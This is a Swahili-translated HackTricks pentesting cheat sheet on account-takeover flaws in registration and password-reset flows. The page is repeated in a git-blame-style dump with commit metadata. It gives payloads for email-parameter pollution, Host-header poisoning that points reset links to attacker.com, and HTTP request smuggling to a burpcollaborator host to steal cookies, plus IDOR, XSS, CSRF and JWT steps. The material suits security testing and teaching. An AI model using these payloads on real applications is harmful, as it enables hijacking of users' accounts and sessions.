hacktricks/pentesting-web/registration-vulnerabilities.md

# Misaada ya Usajili & Udhibiti wa Akaunti

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

## WhiteIntel

<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na **malware za kuiba**.

Lengo kuu la WhiteIntel ni kupambana na udhibiti wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:

{% embed url="https://whiteintel.io" %}

---

## Udhibiti wa Usajili

### Usajili wa Kulinganisha

* Jaribu kujaribu kutumia jina la mtumiaji lililopo
* Angalia kwa kubadilisha barua pepe:
  * herufi kubwa
  * \+1@
  * ongeza alama ya mshale katika barua pepe
  * herufi maalum katika jina la barua pepe (%00, %09, %20)
  * Weka herufi nyeusi baada ya barua pepe: `test@test.com a`
  * victim@gmail.com@attacker.com
  * victim@attacker.com@gmail.com

### Uchunguzi wa Jina la Mtumiaji

Angalia ikiwa unaweza kugundua wakati jina la mtumiaji tayari limeandikishwa ndani ya programu.

### Sera ya Nenosiri

Kuunda mtumiaji angalia sera ya nenosiri (angalia ikiwa unaweza kutumia nywila dhaifu).\
Katika kesi hiyo unaweza kujaribu kudukua maelezo ya kuingia.

### Udukuzi wa SQL

[**Angalia ukurasa huu** ](sql-injection/#insert-statement)ili kujifunza jinsi ya kujaribu udhibiti wa akaunti au kutoa taarifa kupitia **SQL Injections** kwenye fomu za usajili.

### Udukuzi wa Oauth

{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}

### Mapungufu ya SAML

{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}

### Badilisha Barua pepe

Baada ya kusajili jaribu kubadilisha barua pepe na angalia ikiwa mabadiliko haya yanathibitishwa kwa usahihi au yanaweza kubadilishwa kuwa barua pepe za kupindukia.

### Uchunguzi Zaidi

* Angalia ikiwa unaweza kutumia **barua pepe za kutumika mara moja**
* **Nenosiri ndefu** (>200) husababisha **DoS**
* **Angalia mipaka ya kiwango cha uundaji wa akaunti**
* Tumia username@**burp\_collab**.net na uchambue **kurudi kwa wito**

## **Udhibiti wa Rudisha Nenosiri**

### Kuvuja kwa Alama ya Rudisha Nenosiri Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Omba kurejesha nenosiri kwa anwani yako ya barua pepe
2. Bonyeza kiungo cha kurejesha nenosiri
3. Usibadilishe nenosiri
4. Bonyeza tovuti za tatu (k.m: Facebook, twitter)
5. Kukamata ombi katika proksi ya Burp Suite
6. Angalia ikiwa kichwa cha referrer kinavuja nenosiri la kurejesha nenosiri.

### Sumu ya Rudisha Nenosiri <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Kukamata ombi la kurejesha nenosiri katika Burp Suite
2. Ongeza au hariri vichwa vifuatavyo katika Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Wasilisha ombi lenye kichwa kilichobadilishwa\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Tafuta URL ya kurejesha nenosiri kulingana na _kichwa cha mwenyeji_ kama: `https://attacker.com/reset-password.php?token=TOKEN`

### Rudisha Nenosiri Kupitia Parameta ya Barua pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### IDOR kwenye Vigezo vya API <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>

1. Mshambuliaji lazima aingie kwenye akaunti yao na kwenda kwenye kipengele cha **Badilisha nenosiri**.
2. Anza Burp Suite na Kukamata ombi
3. Tuma kwenye kichupo cha kurudia na urekebishe vigezo: Kitambulisho cha Mtumiaji/barua pepe\
`powershell POST /api/changepass [...] ("fomu": {"barua pepe":"mwathirika@email.com","nenosiri":"nenosiri salama"})`

### Kitufe Dhaifu cha Kurejesha Nenosiri <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>

Kitufe cha kurejesha nenosiri kinapaswa kuundwa kwa nasibu na kuwa tofauti kila wakati.\
Jaribu kubaini ikiwa kitufe hicho kina muda wa kumalizika au ikiwa ni sawa kila wakati, kwa baadhi ya matukio, algorithmu ya uundaji ni dhaifu na inaweza kubashiriwa. Vigezo vifuatavyo vinaweza kutumiwa na algorithmu.

* Muda wa saa
* Kitambulisho cha Mtumiaji
* Barua pepe ya Mtumiaji
* Jina la Kwanza na la Mwisho
* Tarehe ya Kuzaliwa
* Kriptografia
* Nambari pekee
* Mfuatano mdogo wa kitufe (herufi kati ya \[A-Z,a-z,0-9])
* Utumiaji wa kitufe
* Tarehe ya muda wa kitufe kumalizika

### Kuvuja kwa Kitufe cha Kurejesha Nenosiri <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>

1. Chochote ombi la kurejesha nenosiri kwa kutumia API/UI kwa barua pepe fulani kama vile: test@mail.com
2. Angalia majibu ya seva na tafuta `resetToken`
3. Kisha tumia kitufe kwenye URL kama `https://mfano.com/v3/mtumiaji/nenosiri/rejesha?resetToken=[KITUFU_CHA_KUREJESHA]&barua pepe=[BARUA_PEPE]`

### Kurejesha Nenosiri Kupitia Mgongano wa Jina la Mtumiaji <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>

1. Jisajili kwenye mfumo na jina la mtumiaji linalofanana na jina la mtumiaji wa muhanga, lakini na nafasi nyeupe zilizoingizwa kabla na/au baada ya jina la mtumiaji. k.m: `"admin "`
2. Omba kurejesha nenosiri na jina lako la mtumiaji la hila.
3. Tumia kitufe kilichotumwa kwenye barua pepe yako na urejeshe nenosiri la muhanga.
4. Unganisha kwenye akaunti ya muhanga na nenosiri jipya.

Jukwaa la CTFd lilikuwa na udhaifu wa shambulio hili.\
Angalia: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)

### Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Tovuti ya Msalaba <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>

1. Tafuta XSS ndani ya programu au kikoa ikiwa vidakuzi vimeelekezwa kwa kikoa cha mzazi: `*.domain.com`
2. Vujisha **kuki za kikao za sasa**
3. Thibitisha kama mtumiaji kwa kutumia kuki

### Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Ombi la HTTP <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>

1. Tumia **smuggler** kugundua aina ya Udukuzi wa Ombi la HTTP (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2. Unda ombi litakalobadilisha `POST / HTTP/1.1` na data ifuatayo:\
`GET http://kitu.burpcollaborator.net HTTP/1.1 X:` kwa lengo la kuhamisha waathiriwa kwenye burpcollab na kuiba kuki zao\
3. Ombi la mwisho linaweza kuonekana kama ifuatavyo
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```
Hackerone ripoti za kutumia kosa hili\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)

### Kuchukua Udhibiti wa Akaunti kupitia CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>

1. Unda mzigo wa CSRF, k.m: "Fomu ya HTML na utoaji wa moja kwa moja kwa mabadiliko ya nenosiri"
2. Tuma mzigo

### Kuchukua Udhibiti wa Akaunti kupitia JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>

Tokeni ya JSON Web inaweza kutumika kuthibitisha mtumiaji.

* Hariri JWT na Kitambulisho cha Mtumiaji / Barua pepe nyingine
* Angalia saini dhaifu ya JWT

{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}

## Marejeo

* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)


## WhiteIntel

<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.

Lengo kuu la WhiteIntel ni kupambana na kuchukua akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.

Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:

{% embed url="https://whiteintel.io" %}


<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`# Misaada ya Usajili & Udhibiti wa Akaunti`

			`<details>`

			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
a 2024-02-03 14:45:32 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`

			`</details>`

			`## WhiteIntel`

			`<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>`

			`[WhiteIntel](https://whiteintel.io) ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na malware za kuiba.`

			`Lengo kuu la WhiteIntel ni kupambana na udhibiti wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.`

			`Unaweza kutembelea tovuti yao na kujaribu injini yao bure hapa:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`{% embed url="https://whiteintel.io" %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`---`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`## Udhibiti wa Usajili`

			`### Usajili wa Kulinganisha`

			`* Jaribu kujaribu kutumia jina la mtumiaji lililopo`
			`* Angalia kwa kubadilisha barua pepe:`
			`* herufi kubwa`
			`* \+1@`
			`* ongeza alama ya mshale katika barua pepe`
			`* herufi maalum katika jina la barua pepe (%00, %09, %20)`
			* Weka herufi nyeusi baada ya barua pepe: `test@test.com a`
			`* victim@gmail.com@attacker.com`
			`* victim@attacker.com@gmail.com`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Uchunguzi wa Jina la Mtumiaji`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Angalia ikiwa unaweza kugundua wakati jina la mtumiaji tayari limeandikishwa ndani ya programu.`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Sera ya Nenosiri`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`Kuunda mtumiaji angalia sera ya nenosiri (angalia ikiwa unaweza kutumia nywila dhaifu).\`
			`Katika kesi hiyo unaweza kujaribu kudukua maelezo ya kuingia.`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Udukuzi wa SQL`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`[Angalia ukurasa huu ](sql-injection/#insert-statement)ili kujifunza jinsi ya kujaribu udhibiti wa akaunti au kutoa taarifa kupitia SQL Injections kwenye fomu za usajili.`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Udukuzi wa Oauth`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
GITBOOK-3788: No subject 2023-02-16 18:26:56 +00:00			`{% content-ref url="oauth-to-account-takeover.md" %}`
			`[oauth-to-account-takeover.md](oauth-to-account-takeover.md)`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% endcontent-ref %}`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Mapungufu ya SAML`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% content-ref url="saml-attacks/" %}`
			`[saml-attacks](saml-attacks/)`
			`{% endcontent-ref %}`
GitBook: [master] 7 pages and 2 assets modified 2021-06-27 15:43:01 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Badilisha Barua pepe`
GitBook: [master] 7 pages and 2 assets modified 2021-06-27 15:43:01 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`Baada ya kusajili jaribu kubadilisha barua pepe na angalia ikiwa mabadiliko haya yanathibitishwa kwa usahihi au yanaweza kubadilishwa kuwa barua pepe za kupindukia.`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Uchunguzi Zaidi`
GitBook: [master] 3 pages modified 2021-06-27 14:55:59 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`* Angalia ikiwa unaweza kutumia barua pepe za kutumika mara moja`
			`* Nenosiri ndefu (>200) husababisha DoS`
			`* Angalia mipaka ya kiwango cha uundaji wa akaunti`
			`* Tumia username@burp\_collab.net na uchambue kurudi kwa wito`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`## Udhibiti wa Rudisha Nenosiri`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Kuvuja kwa Alama ya Rudisha Nenosiri Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`1. Omba kurejesha nenosiri kwa anwani yako ya barua pepe`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`2. Bonyeza kiungo cha kurejesha nenosiri`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`3. Usibadilishe nenosiri`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`4. Bonyeza tovuti za tatu (k.m: Facebook, twitter)`
			`5. Kukamata ombi katika proksi ya Burp Suite`
			`6. Angalia ikiwa kichwa cha referrer kinavuja nenosiri la kurejesha nenosiri.`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Sumu ya Rudisha Nenosiri <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`1. Kukamata ombi la kurejesha nenosiri katika Burp Suite`
			2. Ongeza au hariri vichwa vifuatavyo katika Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
			`3. Wasilisha ombi lenye kichwa kilichobadilishwa\`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`http POST https://example.com/reset.php HTTP/1.1 Accept: / Content-Type: application/json Host: attacker.com`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			4. Tafuta URL ya kurejesha nenosiri kulingana na _kichwa cha mwenyeji_ kama: `https://attacker.com/reset-password.php?token=TOKEN`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Rudisha Nenosiri Kupitia Parameta ya Barua pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00			```powershell
			`# parameter pollution`
			`email=victim@mail.com&email=hacker@mail.com`

			`# array of emails`
			`{"email":["victim@mail.com","hacker@mail.com"]}`

			`# carbon copy`
			`email=victim@mail.com%0A%0Dcc:hacker@mail.com`
			`email=victim@mail.com%0A%0Dbcc:hacker@mail.com`

			`# separator`
			`email=victim@mail.com,hacker@mail.com`
			`email=victim@mail.com%20hacker@mail.com`
			`email=victim@mail.com\|hacker@mail.com`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### IDOR kwenye Vigezo vya API <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`1. Mshambuliaji lazima aingie kwenye akaunti yao na kwenda kwenye kipengele cha Badilisha nenosiri.`
			`2. Anza Burp Suite na Kukamata ombi`
			`3. Tuma kwenye kichupo cha kurudia na urekebishe vigezo: Kitambulisho cha Mtumiaji/barua pepe\`
			`powershell POST /api/changepass [...] ("fomu": {"barua pepe":"mwathirika@email.com","nenosiri":"nenosiri salama"})`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Kitufe Dhaifu cha Kurejesha Nenosiri <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`Kitufe cha kurejesha nenosiri kinapaswa kuundwa kwa nasibu na kuwa tofauti kila wakati.\`
			`Jaribu kubaini ikiwa kitufe hicho kina muda wa kumalizika au ikiwa ni sawa kila wakati, kwa baadhi ya matukio, algorithmu ya uundaji ni dhaifu na inaweza kubashiriwa. Vigezo vifuatavyo vinaweza kutumiwa na algorithmu.`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`* Muda wa saa`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Kitambulisho cha Mtumiaji`
			`* Barua pepe ya Mtumiaji`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`* Jina la Kwanza na la Mwisho`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Tarehe ya Kuzaliwa`
			`* Kriptografia`
			`* Nambari pekee`
			`* Mfuatano mdogo wa kitufe (herufi kati ya \[A-Z,a-z,0-9])`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`* Utumiaji wa kitufe`
			`* Tarehe ya muda wa kitufe kumalizika`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Kuvuja kwa Kitufe cha Kurejesha Nenosiri <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`1. Chochote ombi la kurejesha nenosiri kwa kutumia API/UI kwa barua pepe fulani kama vile: test@mail.com`
Translated to Swahili 2024-02-11 02:13:58 +00:00			2. Angalia majibu ya seva na tafuta `resetToken`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			3. Kisha tumia kitufe kwenye URL kama `https://mfano.com/v3/mtumiaji/nenosiri/rejesha?resetToken=[KITUFU_CHA_KUREJESHA]&barua pepe=[BARUA_PEPE]`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Kurejesha Nenosiri Kupitia Mgongano wa Jina la Mtumiaji <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			1. Jisajili kwenye mfumo na jina la mtumiaji linalofanana na jina la mtumiaji wa muhanga, lakini na nafasi nyeupe zilizoingizwa kabla na/au baada ya jina la mtumiaji. k.m: `"admin "`
			`2. Omba kurejesha nenosiri na jina lako la mtumiaji la hila.`
			`3. Tumia kitufe kilichotumwa kwenye barua pepe yako na urejeshe nenosiri la muhanga.`
			`4. Unganisha kwenye akaunti ya muhanga na nenosiri jipya.`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`Jukwaa la CTFd lilikuwa na udhaifu wa shambulio hili.\`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Angalia: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Tovuti ya Msalaba <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			1. Tafuta XSS ndani ya programu au kikoa ikiwa vidakuzi vimeelekezwa kwa kikoa cha mzazi: `*.domain.com`
			`2. Vujisha kuki za kikao za sasa`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`3. Thibitisha kama mtumiaji kwa kutumia kuki`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`### Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Ombi la HTTP <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`1. Tumia smuggler kugundua aina ya Udukuzi wa Ombi la HTTP (CL, TE, CL.TE)\`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00			`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			2. Unda ombi litakalobadilisha `POST / HTTP/1.1` na data ifuatayo:\
			`GET http://kitu.burpcollaborator.net HTTP/1.1 X:` kwa lengo la kuhamisha waathiriwa kwenye burpcollab na kuiba kuki zao\
			`3. Ombi la mwisho linaweza kuonekana kama ifuatavyo`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00			```
			`GET / HTTP/1.1`
			`Transfer-Encoding: chunked`
			`Host: something.com`
			`User-Agent: Smuggler/v1.0`
			`Content-Length: 83`
			`0`

			`GET http://something.burpcollaborator.net HTTP/1.1`
			`X: X`
			```
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`Hackerone ripoti za kutumia kosa hili\`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00			`\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\`
			`\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kuchukua Udhibiti wa Akaunti kupitia CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`1. Unda mzigo wa CSRF, k.m: "Fomu ya HTML na utoaji wa moja kwa moja kwa mabadiliko ya nenosiri"`
			`2. Tuma mzigo`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kuchukua Udhibiti wa Akaunti kupitia JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`Tokeni ya JSON Web inaweza kutumika kuthibitisha mtumiaji.`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Hariri JWT na Kitambulisho cha Mtumiaji / Barua pepe nyingine`
